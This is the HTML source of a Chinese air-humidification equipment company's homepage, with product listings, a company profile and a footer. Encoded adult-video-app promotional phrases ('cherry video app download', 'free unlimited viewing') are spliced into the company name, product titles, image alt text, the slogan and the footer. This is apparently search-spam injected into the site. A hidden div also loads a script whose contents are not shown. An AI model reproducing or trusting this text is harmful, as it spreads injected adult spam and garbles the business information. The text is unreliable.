<P><FONT style="FONT-SIZE: 14px; FONT-FAMILY: 宋體; COLOR: rgb(0,0,0)">上海&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;空氣淨化設備技術有限公司<BR>電話：021-64930855 / 34529356<BR>傳真：021-64930856<BR>全囯免費熱線：400-627-6523<BR>24小時服務電話：13122825169<BR>地址：上海市閔行區莘北路518號商務園區4號樓<BR>網址：www.b2mp.net<BR>郵箱：yqh21cn@163.com</FONT></P>
<DIV id=linksID>&nbsp;</DIV>
<SCRIPT>document.getElementById("linksID").style.display="none"</SCRIPT>
</div>
</div>
</td>
  <td style="width:74%; vertical-align:top;">
  
  <div>
<table border="0" cellpadding="0" cellspacing="0" style="width:100%;">
 <tr>
  <td style="padding-left:5px; width:12%; height:30px; border-bottom:solid 2px #1678d1;" class="text3">產品展示</td>
  <td style="padding-right:5px; width:88%; border-bottom:solid 2px #cccccc; text-align:right;"><a id="f337b38b76" href="product.asp">MORE&gt;&gt;</a></td>
 </tr>
</table>
<div id="f337b38b76" style="padding:10px 0px 10px 0px; line-height:20px;">
<div id="demo_left" style="overflow:hidden; width:698px;">
<table cellpadding="0" cellspacing="0" style="width:100%;">
 <tr>
  <td id="demo1_left">
<table cellpadding="0" cellspacing="10" style="width:100%;"><tr>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=325"><img src="./uploadfiles/shopping/2011031912171376491_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;民用除濕機" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=325" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;民用除濕機</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=292"><img src="./uploadfiles/shopping/2011072111074340573_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;高壓微霧加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=292" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;高壓微霧加濕器</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=284"><img src="./uploadfiles/shopping/2011031911282210417_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;吊頂除濕機" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=284" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;吊頂除濕機</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=280"><img src="./uploadfiles/shopping/2011031911202354318_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;風道式電極式加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=280" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;風道式電極式加濕器</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=279"><img src="./uploadfiles/shopping/2011031911185615012_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;獨立電極式加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=279" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;獨立電極式加濕器</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=273"><img src="./uploadfiles/shopping/2011072114180714020_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;超市專用加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=273" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;超市專用加濕器</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=268"><img src="./uploadfiles/shopping/2011031911071312051_0.jpg" alt="超聲波加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=268" class="listlink">超聲波加濕器</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=266"><img src="./uploadfiles/shopping/2011072110555710601_0.jpg" alt="超聲波加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=266" class="listlink">超聲波加濕器</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=265"><img src="./uploadfiles/shopping/2011072110521215239_0.jpg" alt="超聲波加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=265" class="listlink">超聲波加濕器</a></td></tr>
</table></td>
<td><table align="center" cellpadding="0" cellspacing="0" style="width:144px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="./product.asp?id=264"><img src="./uploadfiles/shopping/2011031911032857181_0.jpg" alt="超聲波加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="text-align:center;padding-top:3px;"><a id="f337b38b76" href="./product.asp?id=264" class="listlink">超聲波加濕器</a></td></tr>
</table></td>
</tr></table>  </td>
  <td id="demo2_left"></td>
 </tr>
</table>
<script type="text/javascript">
<!--//
var speed_left=30;
window.document.getElementById("demo2_left").innerHTML=window.document.getElementById("demo1_left").innerHTML;
function _left(){
	if(window.document.getElementById("demo2_left").offsetWidth-window.document.getElementById("demo_left").scrollLeft<=0){
		window.document.getElementById("demo_left").scrollLeft-=window.document.getElementById("demo1_left").offsetWidth;
	}else{window.document.getElementById("demo_left").scrollLeft++;}
}
var MyMar_left=setInterval(_left,speed_left);
window.document.getElementById("demo_left").onmouseover=function(){clearInterval(MyMar_left);}
window.document.getElementById("demo_left").onmouseout=function(){MyMar_left=setInterval(_left,speed_left);}
//-->
</script>
</div>
</div>
</div>
  
 <div>
<table border="0" cellpadding="0" cellspacing="0" style="width:100%;">
 <tr>
  <td style="padding-left:5px; width:12%; height:30px; border-bottom:solid 2px #1678d1;" class="text3">最新產品</td>
  <td style="padding-right:5px; width:88%; border-bottom:solid 2px #cccccc; text-align:right;"></td>
 </tr>
</table>
<div id="f337b38b76" style="padding:10px 0px 10px 0px; line-height:27px; font-size:12px;">
 <table cellpadding="0" cellspacing="0" style="width:100%;"><tr>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=338"><img src="./uploadfiles/shopping/2013121914530361736_0.jpg" alt="恒溫恒濕實驗室" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=338" class="listlink">恒溫恒濕實驗室</a></td></tr>
</table></td>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=337"><img src="./uploadfiles/shopping/2013012217121811321_0.jpg" alt="烤煙回潮機" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=337" class="listlink">烤煙回潮機</a></td></tr>
</table></td>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=334"><img src="./uploadfiles/shopping/2011072517060771878_0.jpg" alt="恒溫恒濕機" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=334" class="listlink">恒溫恒濕機</a></td></tr>
</table></td>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=329"><img src="./uploadfiles/shopping/2011031912223733318_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;中央空調加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=329" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;中央空調加濕器</a></td></tr>
</table></td>
</tr>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=328"><img src="./uploadfiles/shopping/2011031912204821262_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;濕膜直排水加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=328" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;濕膜直排水加濕器</a></td></tr>
</table></td>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=327"><img src="./uploadfiles/shopping/2011072110244218816_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;循環水濕膜加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=327" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;循環水濕膜加濕器</a></td></tr>
</table></td>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=326"><img src="./uploadfiles/shopping/2011031912183866989_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;中央空調加濕器" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=326" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;中央空調加濕器</a></td></tr>
</table></td>
<td style="width:25%; text-align:center;"><table align="center" cellpadding="0" cellspacing="0" style="width:156px;">
<tr><td class="this_div_img"><a id="f337b38b76" href="product.asp?id=325"><img src="./uploadfiles/shopping/2011031912171376491_0.jpg" alt="&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;民用除濕機" border="0" width="150" height="120" onload="javascript:gw_chgimg_wh(this,150,120);" /></a></td></tr>
<tr><td style="padding:3px 0px 7px 0px; text-align:center;"><a id="f337b38b76" href="product.asp?id=325" class="listlink">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;民用除濕機</a></td></tr>
</table></td>
</tr></table>
</div>
</div> 
  
  
  
<div>
<table border="0" cellpadding="0" cellspacing="0" style="width:100%;">
 <tr>
  <td style="padding-left:5px; width:12%; height:30px; border-bottom:solid 2px #1678d1;" class="text3">公司簡介</td>
  <td style="padding-right:5px; width:88%; border-bottom:solid 2px #cccccc; text-align:right;"></td>
 </tr>
</table>
<div id="f337b38b76" style="padding:10px 0px 10px 0px; line-height:22px; font-size:12px;"><STYLE>
<!--
 /* Font Definitions */
 @font-face
	{font-family:宋體;
	panose-1:2 1 6 0 3 1 1 1 1 1;
	mso-font-alt:SimSun;
	mso-font-charset:134;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:3 680460288 22 0 262145 0;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;
	mso-font-charset:0;
	mso-generic-font-family:swiss;
	mso-font-pitch:variable;
	mso-font-signature:-536870145 1073786111 1 0 415 0;}
@font-face
	{font-family:華文細黑;
	panose-1:2 1 6 0 4 1 1 1 1 1;
	mso-font-charset:134;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:647 135200768 16 0 262303 0;}
@font-face
	{font-family:"\@華文細黑";
	panose-1:2 1 6 0 4 1 1 1 1 1;
	mso-font-charset:134;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:647 135200768 16 0 262303 0;}
@font-face
	{font-family:"\@宋體";
	panose-1:2 1 6 0 3 1 1 1 1 1;
	mso-font-charset:134;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:3 680460288 22 0 262145 0;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{mso-style-parent:"";
	margin:0cm;
	margin-bottom:.0001pt;
	text-align:justify;
	text-justify:inter-ideograph;
	mso-pagination:none;
	font-size:10.5pt;
	mso-bidi-font-size:11.0pt;
	font-family:Calibri;
	mso-fareast-font-family:宋體;
	mso-bidi-font-family:"Times New Roman";
	mso-font-kerning:1.0pt;}
strong
	{font-family:"Times New Roman";
	mso-bidi-font-family:"Times New Roman";}
 /* Page Definitions */
 @page
	{mso-page-border-surround-header:no;
	mso-page-border-surround-footer:no;}
@page Section1
	{size:612.0pt 792.0pt;
	margin:72.0pt 90.0pt 72.0pt 90.0pt;
	mso-header-margin:36.0pt;
	mso-footer-margin:36.0pt;
	mso-paper-source:0;}
div.Section1
	{page:Section1;}
-->
</STYLE><STYLE>
 /* Style Definitions */
 table.MsoNormalTable
	{mso-style-name:普通表格;
	mso-tstyle-rowband-size:0;
	mso-tstyle-colband-size:0;
	mso-style-noshow:yes;
	mso-style-parent:"";
	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
	mso-para-margin:0cm;
	mso-para-margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:10.0pt;
	font-family:"Times New Roman";
	mso-fareast-font-family:"Times New Roman";
	mso-ansi-language:#0400;
	mso-fareast-language:#0400;
	mso-bidi-language:#0400;}
</STYLE><P><!--StartFragment-->
<P class=MsoNormal><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 11pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial"><STRONG>&nbsp;</STRONG><FONT style="FONT-SIZE: 16pt"><STRONG>&nbsp;&nbsp;</STRONG><FONT style="FONT-SIZE: 22pt"><STRONG><FONT style="FONT-SIZE: 16pt">上</FONT><FONT style="FONT-SIZE: 16pt">海&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;空氣淨化設備技術有限公司</FONT></STRONG></FONT></FONT></SPAN></P>
<P class=MsoNormal><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 11pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial"><FONT style="FONT-SIZE: 16pt"><FONT style="FONT-SIZE: 22pt"><STRONG>&nbsp;&nbsp;&nbsp;&nbsp; </STRONG><FONT style="FONT-SIZE: 16pt">於</FONT></FONT></FONT></SPAN><FONT style="FONT-SIZE: 16pt"><SPAN style="FONT-FAMILY: 華文細黑; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt" lang=EN-US>2010</SPAN><SPAN style="FONT-FAMILY: 華文細黑; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt">年正式成立，是一家集研發、生產、銷售、服務為一體的製造企業。公司目前主要針空氣濕度處理研製生產加濕機、民用除濕機、工業除濕機、超聲波加濕機、塑料增濕機、老化房及各類非標設備等。公司擁有全套生產流水線，生產設備，測試設備，產品齊全，品類繁多還可以量身定製設備盡供用戶挑選。</SPAN><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial" lang=EN-US><SPAN style="FONT-SIZE: 16pt; mso-spacerun: yes">&nbsp;</SPAN></SPAN></FONT></P>
<P class=MsoNormal><FONT style="FONT-SIZE: 16pt"><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial" lang=EN-US><SPAN style="FONT-SIZE: 16pt; mso-spacerun: yes">&nbsp;</SPAN>&nbsp; </SPAN></FONT></P>
<P class=MsoNormal><FONT style="FONT-SIZE: 16pt"><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial" lang=EN-US>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial">我公司生產的各種加濕器能夠廣泛應用於半導體電子設備廠房、光纖、電子、煙草行業、淨化行業、電池行業、紡織廠、噴漆廠、印刷廠、造紙廠、木材廠、製藥車間、計算機房、程控機房、電信機房、精密機械、精密機房、儀器儀表、圖書室、實驗室、美術館、博物館、醫院手術室、地下工程、電腦室、資料室、檔案館、保齡球館、彈藥庫、儲藏、家庭、寫字樓、賓館公寓飯店、氣調庫、大棚、菌種培植、園藝、溫室、食品加工車間等中央空調係統加濕或空間直接加濕(保濕、恒濕、回潮、降溫、消毒、保鮮、儲藏、植絨、降塵、除靜電、雲霧景觀、美容護膚)實現對生活環境的舒適性加濕和生產加工測試儲運環境的工藝性加濕。</SPAN></FONT></P>
<P class=MsoNormal><FONT style="FONT-SIZE: 16pt"><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial"></SPAN></FONT>&nbsp;</P>
<P class=MsoNormal><FONT style="FONT-SIZE: 16pt"><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial"></SPAN></FONT>&nbsp;</P>
<P class=MsoNormal><FONT style="FONT-SIZE: 16pt"><STRONG><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-WEIGHT: normal; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial; mso-bidi-font-weight: bold" lang=EN-US><SPAN style="mso-spacerun: yes">&nbsp;&nbsp;</SPAN></SPAN><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; COLOR: red; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial" lang=EN-US><SPAN style="mso-spacerun: yes">&nbsp; </SPAN></SPAN></STRONG><SPAN style="FONT-FAMILY: 華文細黑; BACKGROUND: white; FONT-SIZE: 16pt; mso-bidi-font-size: 10.5pt; mso-bidi-font-family: Arial"><FONT style="COLOR: #ff0000; FONT-SIZE: 16pt"><STRONG>優質、高效、團結、創新</STRONG></FONT>，是&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;的公司宗旨，為客戶提供優質的空氣是&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;人永遠的使命。</SPAN></FONT></P><!--EndFragment-->&nbsp; 
<P></P>
</div>
</div>  </td>
 </tr>
</table>
<div id="f337b38b76" style="margin-top:10px; border-top:solid 1px #cccccc; border-bottom:solid 1px #cccccc; background:url(images/top.jpg) top repeat-x; line-height:30px; text-align:center;">
<a id="f337b38b76" href="index.asp">公司簡介</a>　|　<a id="f337b38b76" href="product.asp">產品展示</a>　|　<a id="f337b38b76" href="case.asp">成功案例</a>　|　<a id="f337b38b76" href="fw.asp">售後服務</a>　|　<a id="f337b38b76" href="message.asp">在線留言</a>　|　<a id="f337b38b76" href="contact.asp">聯係&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;</a>
</div><div id="f337b38b76" style="margin-top:10px; line-height:25px; text-align:center;">
Copyright &copy;&nbsp;2020&nbsp;上海&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;空氣淨化設備技術有限公司</a></a> &nbsp;<a id="f337b38b76" rel="nofollow" href="http://beian.miit.gov.cn/" target="_blank">滬ICP備10218180號-1</a>&nbsp; All Rights Reserved.  技術支持：<a id="f337b38b76" rel="nofollow" href="http://www.qi-ju.com" target="_blank">企炬</a>  <a id="f337b38b76" href="admin" target="_blank">後台登錄</a>]</br>
<SCRIPT LANGUAGE="JavaScript" >
document.writeln("<a id="f337b38b76" rel='nofollow' href='http://www.sgs.gov.cn/lz/licenseLink.do?method=licenceView&entyId=20120309135548401'><img src='icon.gif' border=0></a>")</SCRIPT><br />
<div id="f337b38b76" style="width:300px;margin:0 auto; padding:20px 0;">
		 		<a id="f337b38b76" target="_blank" rel="nofollow" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=31011202001413" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="bn.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">滬公網安備 31011202001413號</p></a>
		 	</div>
</div></div>
<script type="text/javascript"> var _bdhmProtocol = (("https:" == document.locations.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F9f3cfcc70a89750ec8d94cb93e0f72f4ar' type='text/javascript'%3E%3C/script%3E")); </script>
<div style="display:none;"><script src="//www.b2mp.net/tj.js"></script></div></body>
</html>
<!-- JiaThis Button BEGIN -->
<script type="text/javascript" src="http://v2.jiathis.com/code/jiathis_r.js?type=left&move=0" charset="utf-8"></script>
<!-- JiaThis Button END --><!--耗时0.0244719982秒-->```